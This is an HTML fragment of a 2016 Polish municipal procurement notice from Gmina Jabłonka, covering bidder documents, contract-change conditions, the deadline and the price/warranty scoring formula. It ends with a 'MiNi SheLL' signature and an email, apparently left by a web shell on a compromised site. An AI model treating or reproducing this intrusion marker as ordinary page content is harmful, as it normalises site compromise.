<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty przetargowej (Załącznik nr 1 do SIWZ);
2. W przypadku Konsorcjum należy dołączyć szczegółową informację o Wykonawcach stanowiących Konsorcjum (Załącznik nr 2 do SIWZ) - jeśli dotyczy;
3. Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i do zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentowania we właściwym rejestrze;
4. Kosztorys ofertowy (ma charakter jedynie informacyjny i pomocniczy)
5. Oferta oraz wszystkie wymagane załączniki wymagają podpisu osób uprawnionych do reprezentowania Wykonawcy, zgodnie z wymaganiami ustawowymi. W przypadku, kiedy ofertę składa kilka podmiotów wspólnie, ofertę oraz wszystkie załączniki muszą być podpisane przez osoby uprawnione do reprezentowania każdego z podmiotów.
6. Wykonawcy wspólnie ubiegający się o udzielnie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego postępowania. Do oferty należy załączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo, o ile nie wynika to z innych dokumentów załączonych przez Wykonawcę.
7. Sposób oceny spełniania warunków udziału w postępowaniu: Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia - nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił w/w warunki.
8. Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert na podstawie art. 26 ust. 3.
9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: - wymagane w pkt III.4.2., III.4.4., niniejszej części dokumenty winien złożyć każdy Wykonawca. Pozostałe dokumenty wymagane w niniejszej części winny być złożone wspólnie przez Wykonawców. 
10.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi  zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (art. 26 ust. 2b ustawy Prawo zamówień publicznych).
11. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt 1.5. odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
12. Wykonawca może występować tylko w jednej Ofercie, czy to indywidualnie czy też jako Partner Konsorcjum w odniesieniu do tego samego zadania inwestycyjnego. 
13. W celu potwierdzenia spełnienia opisanych wyżej warunków Wykonawca musi załączyć do oferty dokumenty określone w Rozdziale 12 SIWZ na podstawie, których zostanie dokonana ocena spełnienia warunków określonych w Rozdziale 11 SIWZ. 
1.9. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
14. Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 
15. Zamawiający zwróci się do wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących powiązań, o których mowa w art. 24 ust. 2 pkt 5, istniejących między przedsiębiorcami, w celu ustalenia, czy zachodzą przesłanki wykluczenia wykonawcy. 
16. Zamawiający, oceniając wyjaśnienia, bierze pod uwagę obiektywne czynniki, w  szczególności wpływ powiązań, o których mowa w art. 24 ust. 2 pkt 5, istniejących między przedsiębiorcami, na ich zachowania w postępowaniu oraz przestrzeganie zasady uczciwej konkurencji.
17. Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawców, którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), złożyli odrębne oferty w tym samym postępowaniu, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy wykonawcami w postępowaniu o udzielenie zamówienia.
18. Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który nie złożył wyjaśnień, oraz wykonawcę, który nie złożył listy, o której mowa w art. 26 ust. 2d.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji jakości - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Możliwość dokonywania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy Zamawiający przewiduje tylko w następujących przypadkach:
1) Zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów (inspektorów nadzoru) przedstawionych w umowie na inne legitymujące się, co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody Zamawiającego.
2) Zmiana podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego
3) Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie wykonawcy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego
4) Niezgodności dokumentacji zgromadzonej w postępowaniu o udzielenie zamówienia publicznego z rzeczywistym stanem faktycznym, który ujawni się w toku realizacji przez Wykonawcę zamówienia publicznego, a jest wynikiem okoliczności niezawinionych przez Zamawiającego
5) Zmiana danych podmiotowych dotyczących kierownika budowy i robót, oraz inspektora nadzoru (zmiana osób, przy pomocy, których wykonawca realizuje przedmiot umowy na inne legitymujące się, co najmniej takimi samymi uprawnieniami, jakie wymagane były w SIWZ)
6) W wyniku urzędowej zmiany stawki podatku VAT. Należny podatek VAT naliczony zostanie do ceny netto w fakturze wg stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w zakresie tego.
7) Zmiany terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadkach:
a) zawieszenie robót przez Zamawiającego
b) szczególnie niesprzyjających warunków atmosferycznych
c) zmian w dokumentacji dokonanych na wniosek Zamawiającego
d) opóźnienia przekazania terenu realizacji robót
e) zmiany terminu dokonania odbioru robót przewidzianych w umowie
f) odmiennych od przyjętych warunków geologicznych
g) odmiennych od przyjętych warunków terenowych w szczególności istnienia niezinwentaryzowanej infrastruktury podziemnej sieci, instalacji lub innych niezinwentaryzowanych obiektów budowlanych
h) siły wyższej, w wyniku, której nie jest możliwe zachowanie przez Wykonawcę określonego umową terminu realizacja zamówienia publicznego, tj. wystąpienie wyjątkowego zdarzenia lub okoliczności, warunków atmosferycznych uniemożliwiających zachowanie technologii wykonania robót, 
i) w przypadku wystąpienia robót dodatkowych, koniecznych do wykonania podstawowego zakresu zadania oraz konieczności wprowadzenia zmian ilościowych do przedmiaru robót na skutek sytuacji niemożliwej wcześniej do przewidzenia, zmian technologii wykonania robót lub zmiany materiałów, jeżeli nowe rozwiązania będą korzystne dla zamawiającego, przy zachowaniu nie pogorszonych standardów jakościowych, 
j) konieczności wykonania prac wynikających z zaleceń organów administracji architektoniczno-budowlanej np.: Nadzoru Budowlanego, PIP, Konserwatora Zabytków itp. wydanych stosownie do ich właściwości;
k) przekroczenie ustawowych terminów wydania przez organ administracji lub innych instytucji branżowych decyzji, zezwoleń, uzgodnień itp.,
l) odmowa wydania przez w/w organy wymaganych decyzji, uzgodnień, zezwoleń itp.,
ł) opóźnień Zamawiającego w przekazaniu Wykonawcy dokumentów wymaganych przepisami, do których przekazania był zobowiązany
m) wstrzymanie wykonania prac przez uprawnione organy
n) zmiana prawa lub obowiązujących norm wywołujących konieczność zmiany zakresu lub harmonogramu pracy
8) zmiany sposobu realizacji przedmiotu zamówienia w postaci:
a) konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w specyfikacjach, dokumentacji technicznej, w przypadku gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,
b) odmiennych od przyjętych w specyfikacjach, dokumentacji technicznej, warunków geologicznych skutkujących niemożnością zrealizowania przedmiotu zamówienia przy
dotychczasowych założeniach technologicznych,
c) odmiennych od przyjętych w specyfikacjach, dokumentacji technicznej, warunków
terenowych w szczególności istnienia niezinwentaryzowanej infrastruktury podziemnej
sieci, instalacji lub innych niezinwentaryzowanych obiektów budowlanych skutkujących
niemożnością zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach
technologicznych, 
d) konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych ze względu na zmiany obowiązującego prawa, 
Zmiany dokonane w granicach przewidzianych w ustawie Prawo budowlane wynikające z:
e) wprowadzenia uzgodnionych rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego
f) gdy zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a ust. 5 lub dokonane zostały zgodnie z zapisami art. 36a ust. 6 ustawy z zastrzeżeniem art. 57 ust. 2 ustawy Prawo budowlane,
g) wad dokumentacji projektowej
- na wniosek Zamawiającego lub Wykonawcy (pod warunkiem pisemnej zgody Zamawiającego)
9) Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części robót wraz z określeniem maksymalnej wielkości tych robót i określeniem kwoty należnej za tą część w granicach udokumentowanego interesu Zamawiającego -na wniosek Inspektora Nadzoru  Inwestorskiego pod warunkiem pisemnej akceptacji Wykonawcy i Zamawiającego.
10) Wystąpienie zdarzeń niezależnych od stron umowy, powodujących potrzeb wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla zamawiającego, bez zwiększenia ustalonego wynagrodzenia.
11) Gdy zmiany te są korzystne dla Zamawiającego bez zwiększenia ustalonego wynagrodzenia
12) pozostałe zmiany określone w umowie
2. Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy zmiana danych związanych z
obsługą administracyjno-organizacyjną umowy (np. zmiana konta bankowego).
3. Zmiana może dotyczyć tylko tych postanowień umowy, na których treść mają wpływ okoliczności określone w opisanych powyżej przypadkach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jablonka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jabłonka ul. 3 Maja 1, 34-480 Jabłonka, pok. 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2016 godzina 12:00, miejsce: Urząd Gminy Jabłonka ul. 3 Maja 1, 34-480 Jabłonka, pok. 1 (sekretariat). Otwarcie ofert nastąpi w siedzibie Zamawiającego dnia 06.04.2016r., godz. 12:05, pok. 110 (sala obrad).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się następującymi kryteriami:
a)	Kryterium cena (Kc) - 90 pkt
b)	Kryterium okres gwarancji jakości (Kg) - 10 pkt
l.p.	Kryterium	Znaczenie procentowe kryterium	Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium
1	Cena (Kc)	90 %	90 punktów
2	Okres gwarancji jakości (Kg)	10 %	10 punktów

2. Zasady przyznawania punktów dla poszczególnych kryteriów:
a) Cena /Kc/ - kryterium temu przypisuje się wagę nie więcej niż 90 pkt.
Kryterium ceny dotyczy ceny brutto określonej w formularzu ofertowym, wyrażonej w złotych polskich.
Liczba punktów jaką otrzyma każda z ofert zostanie ustalona w następujący sposób:
oferta, która zawiera najniższą cenę otrzyma maksymalną liczbę punktów przewidzianą dla tego kryterium (90pkt)
ilość punktów jaką otrzymają pozostałe oferty zostanie ustalona wg wzoru:Kc=(Cn/Cb)x90 punktów
Gdzie:
Kc - ilość punktów przyznanych Wykonawcy 
Cn - najniższa zaoferowana cena, spośród wszystkich ofert nie podlegających odrzuceniu 
Cb - cena zaoferowana w ofercie badanej 

b)	Okres gwarancji jakości /Kg/ - kryterium temu przypisuje się wagę nie więcej niż 1 pkt
Kryterium okres gwarancji jakości dotyczy określonego przez Wykonawcę w formularzu oferty okresu gwarancji jakości.

UWAGA! Zamawiający wymaga, aby przedmiot zamówienia został objęty gwarancją jakości minimum 36 miesięcy. 
Ilość punktów w kryterium zostanie przyznana w następujący sposób:
Gwarancja jakości na 36 miesięcy - 0 pkt
Gwarancja jakości na 48 miesięcy - 5 pkt
Gwarancja jakości na 60 miesięcy - 10 pkt 
Podanie w ofercie okresu krótszego lub dłuższego gwarancji jakości od wymaganego spowoduje odrzucenie oferty.

Wykonawca może zaproponować okres gwarancji jakości w pełnych miesiącach tj.  36 lub 48 lub 60 miesięcy 
Wykonawca nie może zaoferować okresu gwarancji jakości krótszego niż 36 miesięcy
Wykonawca nie może zaoferować okresu gwarancji jakości dłuższego niż 60 miesięcy

Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 10 punktów
W przypadku błędnego wypełnienia oferty w zakresie Okresu gwarancji jakości (niezgodnie z zaleceniami Zamawiającego, np. brak wskazania okresu gwarancji jakości lub wskazanie błędnego zakresu) oferta otrzyma 0 pkt w tym kryterium, a jako deklarowany okres gwarancji jakości zostanie przyjęty okres 36 miesięcy.
Bez względu na powyższe: Jeżeli warunki gwarancji jakości udzielonej przez producenta materiałów i urządzeń przewidują dłuższy okres gwarancji jakości niż gwarancja udzielona przez Gwaranta - obowiązuje okres gwarancji w wymiarze równym okresowi gwarancji producenta.
3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów (W) obliczoną według następującego wzoru:
W = Kc + Kg
Gdzie:
W - łączna liczba punktów jaką otrzymał Wykonawca
Kc - liczba punktów jaka otrzymał Wykonawca w kryterium cena
Kg - liczna punktów jaką otrzymał Wykonawca w kryterium okres gwarancji
4. Zamawiający udzieli zamówienia Wykonawcy, który uzyska najwyższą liczbę punktów.
5. Ocena ofert dokonywana będzie z dokładnością do dwóch miejsc po przecinku.
6. Do kontaktowania się z Wykonawcami Zamawiający upoważnia: mgr Lidia Czerwonka, Bogdan Kowalczyk, mgr inż. Józef Pieróg.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com